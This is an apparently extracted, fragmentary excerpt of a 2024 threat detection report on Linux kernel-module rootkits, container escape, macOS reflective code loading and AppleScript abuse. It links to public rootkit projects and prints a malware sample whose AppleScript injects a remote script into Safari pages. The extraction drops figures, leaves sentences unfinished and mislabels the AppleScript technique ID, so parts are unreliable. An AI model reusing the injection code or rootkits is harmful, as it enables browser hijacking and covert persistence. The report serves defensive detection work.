from a buffer in memory while the finit _ module syscall is used to load
kernel modules from a file descriptor. Typically, if a program wants to load
kernel modules they can do it in one of three ways:
ConditionDirectoryNotEmpty=|/lib/modules-load.d
ConditionDirectoryNotEmpty=|/usr/lib/modules-load.d
ConditionDirectoryNotEmpty=|/usr/local/lib/modules-load.d
ConditionDirectoryNotEmpty=|/etc/modules-load.d
ConditionDirectoryNotEmpty=|/run/modules-load.d
• https://github.com/yaoyumeng/adore-ng
• https://github.com/mncoppola/suterusu
• https://github.com/m0nad/Diamorphine
TAKE
Visit the Kernel Modules and Extensions technique page to explore:
ACTION
• relevant MITRE ATT&CK data sources
• log sources to expand your collection
• detection opportunities you can tune to your environment
• atomic tests to validate your coverage
The best way to prevent or mitigate this technique is to ensure that relevant
software is up to date and patched and that proper access controls are
in place. There are various mechanisms that can be leveraged to prevent
loading a kernel module:
Advanced options
NOTE: These actions may not be possible if the host machine is managed by
a cloud provider.
FEATURED
TECHNIQUE Escape to Host
(T1611)
Escape to Host (i.e., container escape) enables
adversaries to bypass security measures set by
virtualized environments, often allowing them to
gain access to the host system’s resources.
Analysis
What is a container?
Containers are short-lived processes designed to run an application.
They are typically isolated from the underlying host via mechanisms
such as namespaces, cgroups, and capabilities. In combination, these
mechanisms ensure containers are isolated, resource-controlled, and
maintain a level of security.
Vulnerabilities
Lets first consider kernel vulnerabilities. The kernel is the lowest level of
software and hence vulnerabilities that allow adversaries to bypass kernel
protection mechanisms can have an impact across the entire host system.
One example is the “Dirty Pipe” (CVE-2022-0847) privilege escalation
vulnerability, which allows unprivileged users to overwrite data in read-
only files.
While the Dirty Pipe vulnerability does not inherently provide a direct
means of a container escape, it can be chained with another vulnerability
or misconfiguration to escape to the host. Consider a few examples:
Privileged containers
While CAP _ SYS _ ADMIN does not inherently imply a container escape,
it can be coupled with another capability. For example, a container with
the CAP _ SYS _ PTRACE and CAP _ SYS _ ADMIN capabilities could allow
a user to attach to a process running on the host and proxy commands
through it.
Misconfigurations
TAKE
Visit the Escape to Host technique page to explore:
ACTION
• relevant MITRE ATT&CK data sources
• log sources to expand your collection
• detection opportunities you can tune to your environment
• atomic tests to validate your coverage
FEATURED
TECHNIQUE Reflective Code Loading
(T1620)
Adversaries commonly abuse deprecated (since
Mac OS X 10.5) reflective loading APIs on macOS
to evade detection.
Analysis
Note: Reflective Code Loading is a broad, cross-platform
technique, and we’ve chosen to focus our analysis specifically on this
technique in the context of macOS.
If the host process has Hardened Runtime enabled, which is the default
in Xcode and disallows reflection, then one of two entitlements must be
signed to the host binary to allow the execution of unsigned memory:
• com.apple.security.cs.allow-unsigned-executable-memory
• com.apple.security.cs.disable-executable-page-protection
The main benefit of reflective loading is that adversaries are never writing
their payload to disk (or so they believe) and thus evading EDR, AV, and
XProtect’s defenses. Additionally, reflective loading effectively enables a
binary to “bypass” Gatekeeper’s first launch checks, as noted by Csaba
Fitzl. The advantages of correctly executing this technique are clear, but
modern macOS systems present formidable roadblocks to an adversary in
the form of Apple’s code-level mitigations and implementation complexity,
which we’re about to explore.
/private/var/folders/.../NSCreateObjectFileImageFromMemory-
XXXXXXXX
2024 Threat Detection Report 147
Note that this is just a test, and we’d expect the adversary to fetch the
code remotely (i.e., not from disk). However, by the test exercising the
following we can reliably emulate the following behavior:
NSCreateObjectFileImageFromMemory → NSLinkModule →
NSLookupSymbolInModule → NSAddressOfSymbol (done) →
NSUnLinkModule
In the wild, this behavior will appear very similar in code. Patrick Wardle’s
analysis of OSX.AppleJeus.C provides us direct visibility into what this
looks like, as written by Lazarus Group:
Advanced tradecraft
To our knowledge, adversaries haven’t managed to circumvent these APIs
for in-the-wild reflective code loading. However, red teamers have. For
example, Adam Chester’s Dyld-DeNeuralyzer project aims to circumvent
Apple’s code path mitigations by reminding us that we (largely) own our
address space by either:
(a) utilizing Dyld but patching and hooking the following system calls: mmap
(mapping a file into memory), pread (read bytes from a file descriptor),
and fcntl (adding signatures to a file with F _ ADDFILESIGS _ RETURN and
checking for Library Validation with F _ CHECK _ LV)
2024 Threat Detection Report 149
or
TAKE
Visit the Reflective Code Loading technique page to explore:
ACTION
• relevant MITRE ATT&CK data sources
• log sources to expand your collection
• detection opportunities you can tune to your environment
• atomic tests to validate your coverage
Basic
Modern installs of macOS will largely mitigate the opportunity for adversaries
to reflectively load code on the platform. By building mitigations into new
versions of macOS at a key cinch point, Apple has given defenders ample
time to profile reflectively loaded code statically on disk.
Advanced
However, as we’ve cited above: research published in January 2023
demonstrated it’s possible to successfully restore reflective loading.
Beyond that single implementation, the potential for adversaries to develop
their own dynamic loader always exists. Therefore, defenders cannot rely
on file-based monitoring solutions alone and should opt-in to EDR-based
monitoring solutions to identify suspicious process behaviors.
2024 Threat Detection Report 150
FEATURED
TECHNIQUE
AppleScript
(T1611)
Analysis
Gaining execution on macOS can be noisy. When binaries are dropped
to disk, there is ample opportunity for defenders to respond, be it via
traditional static-based detection or more modern process-centric
behaviors. It’s for this reason that adversaries tend towards a “Living
off the Orchard” (LOOBin) approach, which assumes the host has only
factory software installed. Native Open Scripting Architecture (OSA)
languages like AppleScript offer immensely powerful system automation
and Objective-C bridging functionality that enables execution, defense
evasion, and more. In fact, the prevalence of adversaries abusing OSA
was pressing enough that it prompted us to chat about it for an entire
hour with our friends from Jamf and MITRE.
Variation 1: osascript
This first variation is characterized by executing AppleScript code in-
line or from a file or IPC via the /usr/bin/osascript LOOBin. It typically
happens early in the attack for staging or persisting resources.
Importantly, adversarial use of AppleScript here is relatively easy to
detect.
In the most simple case, if an adversary needs to grab the user’s login
password, for example, they might do something similar to MacStealer’s
implementation. Here they leverage osascript to execute AppleScript
code in-line, generating a basic dialog box.
#!/bin/bash
cd $(dirname $0)
killall firefox
relaunch _ firefox=$?
killall “Google Chrome”
relaunch _ chrome=$?
killall Safari
relaunch _ safari=$?
sleep 2
./BrowserEnhancer.app/Contents/MacOS/BrowserEnhancer $1 $2
$3 $4 $5
global _ pid
set _ pid to “pid _ value _ to _ replace”
repeat
<event _ XFdrljct> {}
end repeat
on <event _ XFdrljct> {}
delay 0.5
try
if is _ Safari _ running() then
tell application “Safari” to set page _ source to
do JavaScript “document.body.innerHTML;” in current tab
of first window
if page _ source does not contain _ pid then
set theURL to URL of current tab of first
window
if theURL is not equal to “about:blank” then
tell application “Safari” to do
JavaScript “var pidDiv = document.createElement(‘div’);
pidDiv.style.display = ‘none’; pidDiv.innerHTML = ‘\”
& _ pid & ‘\”; document.getElementsByTagName(‘body’)[0].
appendChild(pidDiv);” in current tab of first window
tell application “Safari” to do JavaScript
“var js _ script = document.createElement(‘script’); js _
script.type = ‘text/javascript’; js _ script.src = ‘script _
to _ inject’; document.getElementsByTagName(‘head’)[0].
appendChild(js _ script);” in current tab of first window
end if
end if
end if
end try
end <event _ XFdrljct>
on is _ Safari _ running()
tell application “System Events” to (name of processes)
contains “Safari”
2024 Threat Detection Report 154
NSAppleScript
• executeAndReturnError
• executeAppleEvent
OSAKit
• executeAndReturnError
• executeAppleEvent
NSUserAppleScriptTask
• execute(withAppleEvent:completionHandler:)
2024 Threat Detection Report 155
// ...
}
The Poseidon Mythic Agent (written in Go) also has the ability to execute
OSA Code (albeit JXA) via OSAKit’s executeAndReturnError function.
// ...
NSString *codeString = [NSString stringWithUTF8String:s];
OSALanguage *lang = [OSALanguage
languageForName:@”JavaScript”];
OSAScript *script = [[OSAScript alloc]
initWithSource:codeString language:lang];
Variation 3: Applets
Applets, for all intents and purposes, are “apps.” Simply put, they’re
“compiled” OSA code, a thin Mach-O wrapper, and an application
bundle structure. This makes them an ideal candidate in which to
conceal malicious code. We’ve explored this variation in-depth with our
research on application bundle manipulation. However, the key point to
understand is demonstrated by XCSSET’s procedures.
In the following example, you can see that the authors compile a “run
only” applet with osacompile -x. Compiling an applet in this way, as
“run only,” is a form of obfuscation that helps to evade static analysis.
We’ll point the reader to the aevt _ decompile tool developed by
SentinelOne’s Phil Stokes if you happen to come across any examples.
ACTION
• relevant MITRE ATT&CK data sources
• log sources to expand your collection
• detection opportunities you can tune to your environment
• atomic tests to validate your coverage
TAKE
ACTION
But, scroll down and you’re given an idea of what the adversary
is doing here.
TAKE
ACTION
2024 Threat Detection Report 161
acknowledgements
Thanks to the dozens of security experts, writers, editors, designers,
developers, and project managers who invested countless hours to
produce this report. And a huge thanks to the MITRE ATT&CK® team,
whose framework has helped the community take a giant leap forward
in understanding and tracking adversary behaviors. Also a huge thanks
to all the Canaries—past and present—who have worked on past Threat
Detection Reports over the last six years. The Threat Detection Report is
iterative, and parts of the 2024 report are derived from previous years.
This report wouldn’t be possible without all of you!